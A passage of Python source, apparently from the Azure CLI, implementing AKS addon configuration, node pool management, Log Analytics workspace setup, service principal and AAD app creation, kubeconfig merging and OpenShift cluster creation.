'Linux' addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile( enabled=True, config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name} ) addons.remove('virtual-node') if 'ingress-appgw' in addons: addon_profile = ManagedClusterAddonProfile(enabled=True, config={}) if appgw_name is not None: addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name if appgw_subnet_cidr is not None: addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr if appgw_id is not None: addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id if appgw_subnet_id is not None: addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id if appgw_watch_namespace is not None: addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile addons.remove('ingress-appgw') if 'confcom' in addons: addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"}) if enable_sgxquotehelper: addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true" addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile addons.remove('confcom') # error out if any (unrecognized) addons remain if addons: raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format( ",".join(addons), "are" if len(addons) > 1 else "is")) return addon_profiles def _install_dev_spaces_extension(cmd, extension_name): try: from azure.cli.core.extension import operations operations.add_extension(cmd=cmd, extension_name=extension_name) except Exception: # nopa pylint: disable=broad-except return False return True def _update_dev_spaces_extension(cmd, extension_name, extension_module): from azure.cli.core.extension import ExtensionNotInstalledException try: from azure.cli.core.extension import operations operations.update_extension(cmd=cmd, extension_name=extension_name) operations.reload_extension(extension_name=extension_name) except CLIError as err: logger.info(err) except ExtensionNotInstalledException as err: logger.debug(err) return False except ModuleNotFoundError as err: logger.debug(err) logger.error("Error occurred attempting to load the extension module. Use --debug for more information.") return False return True def _get_or_add_extension(cmd, extension_name, extension_module, update=False): from azure.cli.core.extension import (ExtensionNotInstalledException, get_extension) try: get_extension(extension_name) if update: return _update_dev_spaces_extension(cmd, extension_name, extension_module) except ExtensionNotInstalledException: return _install_dev_spaces_extension(cmd, extension_name) return True def _ensure_default_log_analytics_workspace_for_monitoring(cmd, subscription_id, resource_group_name): # mapping for azure public cloud # log analytics workspaces cannot be created in WCUS region due to capacity limits # so mapped to EUS per discussion with log analytics team AzureCloudLocationToOmsRegionCodeMap = { "australiasoutheast": "ASE", "australiaeast": "EAU", "australiacentral": "CAU", "canadacentral": "CCA", "centralindia": "CIN", "centralus": "CUS", "eastasia": "EA", "eastus": "EUS", "eastus2": "EUS2", "eastus2euap": "EAP", "francecentral": "PAR", "japaneast": "EJP", "koreacentral": "SE", "northeurope": "NEU", "southcentralus": "SCUS", "southeastasia": "SEA", "uksouth": "SUK", "usgovvirginia": "USGV", "westcentralus": "EUS", "westeurope": "WEU", "westus": "WUS", "westus2": "WUS2", "brazilsouth": "CQ", "brazilsoutheast": "BRSE", "norwayeast": "NOE", "southafricanorth": "JNB", "northcentralus": "NCUS", "uaenorth": "DXB", "germanywestcentral": "DEWC", "ukwest": "WUK", "switzerlandnorth": "CHN", "switzerlandwest": "CHW", "uaecentral": "AUH" } AzureCloudRegionToOmsRegionMap = { "australiacentral": "australiacentral", "australiacentral2": "australiacentral", "australiaeast": "australiaeast", "australiasoutheast": "australiasoutheast", "brazilsouth": "brazilsouth", "canadacentral": "canadacentral", "canadaeast": "canadacentral", "centralus": "centralus", "centralindia": "centralindia", "eastasia": "eastasia", "eastus": "eastus", "eastus2": "eastus2", "francecentral": "francecentral", "francesouth": "francecentral", "japaneast": "japaneast", "japanwest": "japaneast", "koreacentral": "koreacentral", "koreasouth": "koreacentral", "northcentralus": "northcentralus", "northeurope": "northeurope", "southafricanorth": "southafricanorth", "southafricawest": "southafricanorth", "southcentralus": "southcentralus", "southeastasia": "southeastasia", "southindia": "centralindia", "uksouth": "uksouth", "ukwest": "ukwest", "westcentralus": "eastus", "westeurope": "westeurope", "westindia": "centralindia", "westus": "westus", "westus2": "westus2", "norwayeast": "norwayeast", "norwaywest": "norwayeast", "switzerlandnorth": "switzerlandnorth", "switzerlandwest": "switzerlandwest", "uaenorth": "uaenorth", "germanywestcentral": "germanywestcentral", "germanynorth": "germanywestcentral", "uaecentral": "uaecentral", "eastus2euap": "eastus2euap", "brazilsoutheast": "brazilsoutheast" } # mapping for azure china cloud # currently log analytics supported only China East 2 region AzureChinaLocationToOmsRegionCodeMap = { "chinaeast": "EAST2", "chinaeast2": "EAST2", "chinanorth": "EAST2", "chinanorth2": "EAST2" } AzureChinaRegionToOmsRegionMap = { "chinaeast": "chinaeast2", "chinaeast2": "chinaeast2", "chinanorth": "chinaeast2", "chinanorth2": "chinaeast2" } # mapping for azure us governmner cloud AzureFairfaxLocationToOmsRegionCodeMap = { "usgovvirginia": "USGV", "usgovarizona": "PHX" } AzureFairfaxRegionToOmsRegionMap = { "usgovvirginia": "usgovvirginia", "usgovtexas": "usgovvirginia", "usgovarizona": "usgovarizona" } rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name) cloud_name = cmd.cli_ctx.cloud.name workspace_region = "eastus" workspace_region_code = "EUS" # sanity check that locations and clouds match. if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or (cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))): raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."' .format(rg_location)) if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or (cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))): raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."' .format(rg_location)) if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or (cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))): raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."' .format(rg_location)) if cloud_name.lower() == 'azurecloud': workspace_region = AzureCloudRegionToOmsRegionMap.get(rg_location, "eastus") workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(workspace_region, "EUS") elif cloud_name.lower() == 'azurechinacloud': workspace_region = AzureChinaRegionToOmsRegionMap.get(rg_location, "chinaeast2") workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(workspace_region, "EAST2") elif cloud_name.lower() == 'azureusgovernment': workspace_region = AzureFairfaxRegionToOmsRegionMap.get(rg_location, "usgovvirginia") workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(workspace_region, "USGV") else: workspace_region = rg_location workspace_region_code = rg_location.upper() default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(subscription_id, workspace_region_code) default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \ '/workspaces/{2}'.format(subscription_id, default_workspace_resource_group, default_workspace_name) resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id) resources = cf_resources(cmd.cli_ctx, subscription_id) # check if default RG exists if resource_groups.check_existence(default_workspace_resource_group): try: resource = resources.get_by_id(default_workspace_resource_id, '2015-11-01-preview') return resource.id except CloudError as ex: if ex.status_code != 404: raise ex else: resource_groups.create_or_update(default_workspace_resource_group, {'location': workspace_region}) default_workspace_params = { 'location': workspace_region, 'properties': { 'sku': { 'name': 'standalone' } } } async_poller = resources.create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview', default_workspace_params) ws_resource_id = '' while True: result = async_poller.result(15) if async_poller.done(): ws_resource_id = result.id break return ws_resource_id def _ensure_container_insights_for_monitoring(cmd, addon): # Workaround for this addon key which has been seen lowercased in the wild. for key in list(addon.config): if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID): addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(key) workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] workspace_resource_id = workspace_resource_id.strip() if not workspace_resource_id.startswith('/'): workspace_resource_id = '/' + workspace_resource_id if workspace_resource_id.endswith('/'): workspace_resource_id = workspace_resource_id.rstrip('/') # extract subscription ID and resource group from workspace_resource_id URL try: subscription_id = workspace_resource_id.split('/')[2] resource_group = workspace_resource_id.split('/')[4] except IndexError: raise CLIError('Could not locate resource group in workspace-resource-id URL.') # region of workspace can be different from region of RG so find the location of the workspace_resource_id resources = cf_resources(cmd.cli_ctx, subscription_id) try: resource = resources.get_by_id(workspace_resource_id, '2015-11-01-preview') location = resource.location except CloudError as ex: raise ex unix_time_in_millis = int( (datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0) solution_deployment_name = 'ContainerInsights-{}'.format(unix_time_in_millis) # pylint: disable=line-too-long template = { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": { "workspaceResourceId": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics Resource ID" } }, "workspaceRegion": { "type": "string", "metadata": { "description": "Azure Monitor Log Analytics workspace region" } }, "solutionDeploymentName": { "type": "string", "metadata": { "description": "Name of the solution deployment" } } }, "resources": [ { "type": "Microsoft.Resources/deployments", "name": "[parameters('solutionDeploymentName')]", "apiVersion": "2017-05-10", "subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]", "resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]", "properties": { "mode": "Incremental", "template": { "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#", "contentVersion": "1.0.0.0", "parameters": {}, "variables": {}, "resources": [ { "apiVersion": "2015-11-01-preview", "type": "Microsoft.OperationsManagement/solutions", "location": "[parameters('workspaceRegion')]", "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "properties": { "workspaceResourceId": "[parameters('workspaceResourceId')]" }, "plan": { "name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]", "product": "[Concat('OMSGallery/', 'ContainerInsights')]", "promotionCode": "", "publisher": "Microsoft" } } ] }, "parameters": {} } } ] } params = { "workspaceResourceId": { "value": workspace_resource_id }, "workspaceRegion": { "value": location }, "solutionDeploymentName": { "value": solution_deployment_name } } deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis) # publish the Container Insights solution to the Log Analytics workspace return _invoke_deployment(cmd, resource_group, deployment_name, template, params, validate=False, no_wait=False, subscription_id=subscription_id) def _ensure_aks_acr(cli_ctx, client_id, acr_name_or_id, subscription_id, detach=False): from msrestazure.tools import is_valid_resource_id, parse_resource_id # Check if the ACR exists by resource ID. if is_valid_resource_id(acr_name_or_id): try: parsed_registry = parse_resource_id(acr_name_or_id) acr_client = cf_container_registry_service(cli_ctx, subscription_id=parsed_registry['subscription']) registry = acr_client.registries.get(parsed_registry['resource_group'], parsed_registry['name']) except CloudError as ex: raise CLIError(ex.message) _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach) return # Check if the ACR exists by name accross all resource groups. registry_name = acr_name_or_id registry_resource = 'Microsoft.ContainerRegistry/registries' try: registry = get_resource_by_name(cli_ctx, registry_name, registry_resource) except CloudError as ex: if 'was not found' in ex.message: raise CLIError("ACR {} not found. Have you provided the right ACR name?".format(registry_name)) raise CLIError(ex.message) _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach) return def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name): instance = client.get(resource_group_name, cluster_name, nodepool_name) return instance def aks_agentpool_list(cmd, client, resource_group_name, cluster_name): return client.list(resource_group_name, cluster_name) def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name, kubernetes_version=None, zones=None, enable_node_public_ip=False, node_vm_size=None, node_osdisk_type=None, node_osdisk_size=0, node_count=3, vnet_subnet_id=None, ppg=None, max_pods=0, os_type="Linux", min_count=None, max_count=None, enable_cluster_autoscaler=False, node_taints=None, priority=CONST_SCALE_SET_PRIORITY_REGULAR, eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE, spot_max_price=float('nan'), tags=None, labels=None, max_surge=None, mode="User", no_wait=False): instances = client.list(resource_group_name, cluster_name) for agentpool_profile in instances: if agentpool_profile.name == nodepool_name: raise CLIError("Node pool {} already exists, please try a different name, " "use 'aks nodepool list' to get current list of node pool".format(nodepool_name)) upgradeSettings = AgentPoolUpgradeSettings() taints_array = [] if node_taints is not None: for taint in node_taints.split(','): try: taint = taint.strip() taints_array.append(taint) except ValueError: raise CLIError('Taint does not match allowed values. Expect value such as "special=true:NoSchedule".') if node_vm_size is None: if os_type.lower() == "windows": node_vm_size = "Standard_D2s_v3" else: node_vm_size = "Standard_DS2_v2" if max_surge: upgradeSettings.max_surge = max_surge agent_pool = AgentPool( name=nodepool_name, tags=tags, node_labels=labels, count=int(node_count), vm_size=node_vm_size, os_type=os_type, vnet_subnet_id=vnet_subnet_id, proximity_placement_group_id=ppg, agent_pool_type="VirtualMachineScaleSets", max_pods=int(max_pods) if max_pods else None, orchestrator_version=kubernetes_version, availability_zones=zones, scale_set_priority=priority, enable_node_public_ip=enable_node_public_ip, node_taints=taints_array, upgrade_settings=upgradeSettings, mode=mode ) if priority == CONST_SCALE_SET_PRIORITY_SPOT: agent_pool.scale_set_eviction_policy = eviction_policy if isnan(spot_max_price): spot_max_price = -1 agent_pool.spot_max_price = spot_max_price _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool) if node_osdisk_size: agent_pool.os_disk_size_gb = int(node_osdisk_size) if node_osdisk_type: agent_pool.os_disk_type = node_osdisk_type return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool) def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name, nodepool_name, node_count=3, no_wait=False): instance = client.get(resource_group_name, cluster_name, nodepool_name) new_node_count = int(node_count) if instance.enable_auto_scaling: raise CLIError("Cannot scale cluster autoscaler enabled node pool.") if new_node_count == instance.count: raise CLIError("The new node count is the same as the current node count.") instance.count = new_node_count # pylint: disable=no-member return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance) def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name, nodepool_name, kubernetes_version='', node_image_only=False, max_surge=None, no_wait=False): if kubernetes_version != '' and node_image_only: raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.' 'If you only want to upgrade the node version please use the "--node-image-only" option only.') if node_image_only: managed_cluster_client = cf_managed_clusters(cmd.cli_ctx) return _upgrade_single_nodepool_image_version(no_wait, managed_cluster_client, resource_group_name, cluster_name, nodepool_name) instance = client.get(resource_group_name, cluster_name, nodepool_name) instance.orchestrator_version = kubernetes_version if not instance.upgrade_settings: instance.upgrade_settings = AgentPoolUpgradeSettings() if max_surge: instance.upgrade_settings.max_surge = max_surge return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance) def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name, enable_cluster_autoscaler=False, disable_cluster_autoscaler=False, update_cluster_autoscaler=False, min_count=None, max_count=None, tags=None, max_surge=None, mode=None, no_wait=False): update_autoscaler = enable_cluster_autoscaler + disable_cluster_autoscaler + update_cluster_autoscaler if update_autoscaler > 1: raise CLIError('Please specify one of "--enable-cluster-autoscaler" or ' '"--disable-cluster-autoscaler" or ' '"--update-cluster-autoscaler"') if (update_autoscaler == 0 and not tags and not mode and not max_surge): raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or ' '"--disable-cluster-autoscaler" or ' '"--update-cluster-autoscaler" or ' '"--tags" or "--mode" or "--max-surge"') instance = client.get(resource_group_name, cluster_name, nodepool_name) _validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or update_cluster_autoscaler) if enable_cluster_autoscaler: if instance.enable_auto_scaling: logger.warning('Autoscaler is already enabled for this node pool.\n' 'Please run "az aks nodepool update --update-cluster-autoscaler" ' 'if you want to update min-count or max-count.') return None instance.min_count = int(min_count) instance.max_count = int(max_count) instance.enable_auto_scaling = True if update_cluster_autoscaler: if not instance.enable_auto_scaling: raise CLIError('Autoscaler is not enabled for this node pool.\n' 'Run "az aks nodepool update --enable-cluster-autoscaler" ' 'to enable cluster with min-count and max-count.') instance.min_count = int(min_count) instance.max_count = int(max_count) if not instance.upgrade_settings: instance.upgrade_settings = AgentPoolUpgradeSettings() if max_surge: instance.upgrade_settings.max_surge = max_surge if disable_cluster_autoscaler: if not instance.enable_auto_scaling: logger.warning('Autoscaler is already disabled for this node pool.') return None instance.enable_auto_scaling = False instance.min_count = None instance.max_count = None instance.tags = tags if mode is not None: instance.mode = mode return sdk_no_wait(no_wait, client.create_or_update, resource_group_name, cluster_name, nodepool_name, instance) def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name, nodepool_name, no_wait=False): agentpool_exists = False instances = client.list(resource_group_name, cluster_name) for agentpool_profile in instances: if agentpool_profile.name.lower() == nodepool_name.lower(): agentpool_exists = True break if not agentpool_exists: raise CLIError("Node pool {} doesnt exist, " "use 'aks nodepool list' to get current node pool list".format(nodepool_name)) return sdk_no_wait(no_wait, client.delete, resource_group_name, cluster_name, nodepool_name) def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name): return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name) def _ensure_aks_acr_role_assignment(cli_ctx, client_id, registry_id, detach=False): if detach: if not _delete_role_assignments(cli_ctx, 'acrpull', client_id, scope=registry_id): raise CLIError('Could not delete role assignments for ACR. ' 'Are you an Owner on this subscription?') return if not _add_role_assignment(cli_ctx, 'acrpull', client_id, scope=registry_id): raise CLIError('Could not create a role assignment for ACR. ' 'Are you an Owner on this subscription?') return def _ensure_aks_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): aad_session_key = None # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal, aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # We don't need to add role assignment for this created SPN else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') return { 'client_secret': client_secret, 'service_principal': service_principal, 'aad_session_key': aad_session_key, } def _ensure_osa_aad(cli_ctx, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, identifier=None, name=None, create=False, customer_admin_group_id=None): rbac_client = get_graph_rbac_management_client(cli_ctx) if create: # This reply_url is temporary set since Azure need one to create the AAD. app_id_name = 'https://{}'.format(name) if not aad_client_app_secret: aad_client_app_secret = _create_client_secret() # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6", additional_properties=None, type="Scope") # Read directory permissions on Windows Azure Active Directory API directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04", additional_properties=None, type="Role") required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access], additional_properties=None, resource_app_id="00000002-0000-0000-c000-000000000000") list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')" .format(app_id_name))) if list_aad_filtered: aad_client_app_id = list_aad_filtered[0].app_id # Updating reply_url with the correct FQDN information returned by the RP reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(identifier) update_application(client=rbac_client.applications, object_id=list_aad_filtered[0].object_id, display_name=name, identifier_uris=[app_id_name], reply_urls=[reply_url], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) logger.info('Updated AAD: %s', aad_client_app_id) else: result, _aad_session_key = create_application(client=rbac_client.applications, display_name=name, identifier_uris=[app_id_name], homepage=app_id_name, password=aad_client_app_secret, required_resource_accesses=[required_osa_aad_access]) aad_client_app_id = result.app_id logger.info('Created an AAD: %s', aad_client_app_id) # Get the TenantID if aad_tenant_id is None: profile = Profile(cli_ctx=cli_ctx) _, _, aad_tenant_id = profile.get_login_credentials() return OpenShiftManagedClusterAADIdentityProvider( client_id=aad_client_app_id, secret=aad_client_app_secret, tenant_id=aad_tenant_id, kind='AADIdentityProvider', customer_admin_group_id=customer_admin_group_id) def _ensure_service_principal(cli_ctx, service_principal=None, client_secret=None, subscription_id=None, dns_name_prefix=None, location=None, name=None): # TODO: This really needs to be unit tested. rbac_client = get_graph_rbac_management_client(cli_ctx) if not service_principal: # --service-principal not specified, make one. if not client_secret: client_secret = _create_client_secret() salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8') url = 'https://{}.{}.{}.cloudapp.azure.com'.format(salt, dns_name_prefix, location) service_principal, _aad_session_key = _build_service_principal(rbac_client, cli_ctx, name, url, client_secret) if not service_principal: raise CLIError('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') logger.info('Created a service principal: %s', service_principal) # add role first before save it if not _add_role_assignment(cli_ctx, 'Contributor', service_principal): logger.warning('Could not create a service principal with the right permissions. ' 'Are you an Owner on this project?') else: # --service-principal specfied, validate --client-secret was too if not client_secret: raise CLIError('--client-secret is required if --service-principal is specified') return { 'client_secret': client_secret, 'service_principal': service_principal, } def _create_client_secret(): # Add a special character to satisfy AAD SP secret requirements special_char = '$' client_secret = binascii.b2a_hex(os.urandom(10)).decode('utf-8') + special_char return client_secret def _get_rg_location(ctx, resource_group_name, subscription_id=None): groups = cf_resource_groups(ctx, subscription_id=subscription_id) # Just do the get, we don't need the result, it will error out if the group doesn't exist. rg = groups.get(resource_group_name) return rg.location def _check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile): if enable_cluster_autoscaler: if min_count is None or max_count is None: raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler enabled') if int(min_count) > int(max_count): raise CLIError('Value of min-count should be less than or equal to value of max-count') if int(node_count) < int(min_count) or int(node_count) > int(max_count): raise CLIError('node-count is not in the range of min-count and max-count') agent_pool_profile.min_count = int(min_count) agent_pool_profile.max_count = int(max_count) agent_pool_profile.enable_auto_scaling = True else: if min_count is not None or max_count is not None: raise CLIError('min-count and max-count are required for --enable-cluster-autoscaler, please use the flag') def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update): """ Validates the min, max, and node count when performing an update """ if min_count is None or max_count is None: if is_enable_or_update: raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or ' '--update-cluster-autoscaler is set.') if min_count is not None and max_count is not None: if int(min_count) > int(max_count): raise CLIError('Value of min-count should be less than or equal to value of max-count.') def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name): """Merge an unencrypted kubeconfig into the file at the specified path, or print it to stdout if the path is "-". """ # Special case for printing to stdout if path == "-": print(kubeconfig) return # ensure that at least an empty ~/.kube/config exists directory = os.path.dirname(path) if directory and not os.path.exists(directory): try: os.makedirs(directory) except OSError as ex: if ex.errno != errno.EEXIST: raise if not os.path.exists(path): with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'): pass # merge the new kubeconfig into the existing one fd, temp_path = tempfile.mkstemp() additional_file = os.fdopen(fd, 'w+t') try: additional_file.write(kubeconfig) additional_file.flush() merge_kubernetes_configurations(path, temp_path, overwrite_existing, context_name) except yaml.YAMLError as ex: logger.warning('Failed to merge credentials to kube config file: %s', ex) finally: additional_file.close() os.remove(temp_path) def _remove_nulls(managed_clusters): """ Remove some often-empty fields from a list of ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags'] ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id'] sp_attrs = ['secret'] for managed_cluster in managed_clusters: for attr in attrs: if getattr(managed_cluster, attr, None) is None: delattr(managed_cluster, attr) if managed_cluster.agent_pool_profiles is not None: for ap_profile in managed_cluster.agent_pool_profiles: for attr in ap_attrs: if getattr(ap_profile, attr, None) is None: delattr(ap_profile, attr) for attr in sp_attrs: if getattr(managed_cluster.service_principal_profile, attr, None) is None: delattr(managed_cluster.service_principal_profile, attr) return managed_clusters def _remove_osa_nulls(managed_clusters): """ Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation doesn't contain distracting null fields. This works around a quirk of the SDK for python behavior. These fields are not sent by the server, but get recreated by the CLI's own "to_dict" serialization. """ attrs = ['tags', 'plan', 'type', 'id'] ap_master_attrs = ['name', 'os_type'] net_attrs = ['peer_vnet_id'] for managed_cluster in managed_clusters: for attr in attrs: if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None: delattr(managed_cluster, attr) for attr in ap_master_attrs: if getattr(managed_cluster.master_pool_profile, attr, None) is None: delattr(managed_cluster.master_pool_profile, attr) for attr in net_attrs: if getattr(managed_cluster.network_profile, attr, None) is None: delattr(managed_cluster.network_profile, attr) return managed_clusters def _validate_aci_location(norm_location): """ Validate the Azure Container Instance location """ aci_locations = [ "australiaeast", "canadacentral", "centralindia", "centralus", "eastasia", "eastus", "eastus2", "eastus2euap", "japaneast", "northcentralus", "northeurope", "southcentralus", "southeastasia", "southindia", "uksouth", "westcentralus", "westus", "westus2", "westeurope" ] if norm_location not in aci_locations: raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) + ' The available locations are "{}"'.format(','.join(aci_locations))) def osa_list(cmd, client, resource_group_name=None): if resource_group_name: managed_clusters = client.list_by_resource_group(resource_group_name) else: managed_clusters = client.list() return _remove_osa_nulls(list(managed_clusters)) def _format_workspace_id(workspace_id): workspace_id = workspace_id.strip() if not workspace_id.startswith('/'): workspace_id = '/' + workspace_id if workspace_id.endswith('/'): workspace_id = workspace_id.rstrip('/') return workspace_id def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals location=None, compute_vm_size="Standard_D4s_v3", compute_count=3, aad_client_app_id=None, aad_client_app_secret=None, aad_tenant_id=None, vnet_prefix="10.0.0.0/8", subnet_prefix="10.0.0.0/24", vnet_peer=None, tags=None, no_wait=False, workspace_id=None, customer_admin_group_id=None): logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long if location is None: location = _get_rg_location(cmd.cli_ctx, resource_group_name) agent_pool_profiles = [] agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='compute', # Must be 12 chars or less before ACS RP adds to it count=int(compute_count), vm_size=compute_vm_size, os_type="Linux", role=OpenShiftAgentPoolProfileRole.compute, subnet_cidr=subnet_prefix ) agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='infra', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", role=OpenShiftAgentPoolProfileRole.infra, subnet_cidr=subnet_prefix ) agent_pool_profiles.append(agent_node_pool_profile) agent_pool_profiles.append(agent_infra_pool_profile) agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile( name='master', # Must be 12 chars or less before ACS RP adds to it count=int(3), vm_size="Standard_D4s_v3", os_type="Linux", subnet_cidr=subnet_prefix ) identity_providers = [] create_aad = False # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now try: client.get(resource_group_name, name) except CloudError: # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None: create_aad = True osa_aad_identity = _ensure_osa_aad(cmd.cli_ctx, aad_client_app_id=aad_client_app_id, aad_client_app_secret=aad_client_app_secret, aad_tenant_id=aad_tenant_id, identifier=None, name=name, create=create_aad, customer_admin_group_id=customer_admin_group_id) identity_providers.append( OpenShiftManagedClusterIdentityProvider( name='Azure AD', provider=osa_aad_identity ) ) auth_profile = OpenShiftManagedClusterAuthProfile(identity_providers=identity_providers) default_router_profile = OpenShiftRouterProfile(name='default') if vnet_peer is not None: from msrestazure.tools import is_valid_resource_id, resource_id if not is_valid_resource_id(vnet_peer): vnet_peer = resource_id( subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name, namespace='Microsoft.Network', type='virtualNetwork', name=vnet_peer ) if workspace_id is not None: workspace_id = _format_workspace_id(workspace_id) monitor_profile = OpenShiftManagedClusterMonitorProfile(enabled=True, workspace_resource_id=workspace_id) # pylint: disable=line-too-long else: monitor_profile = None network_profile = NetworkProfile(vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer) osamc = OpenShiftManagedCluster( location=location, tags=tags, open_shift_version="v3.11", network_profile=network_profile, auth_profile=auth_profile, agent_pool_profiles=agent_pool_profiles, master_pool_profile=agent_master_pool_profile, router_profiles=[default_router_profile], monitor_profile=monitor_profile) try: # long_running_operation_timeout=300 result = 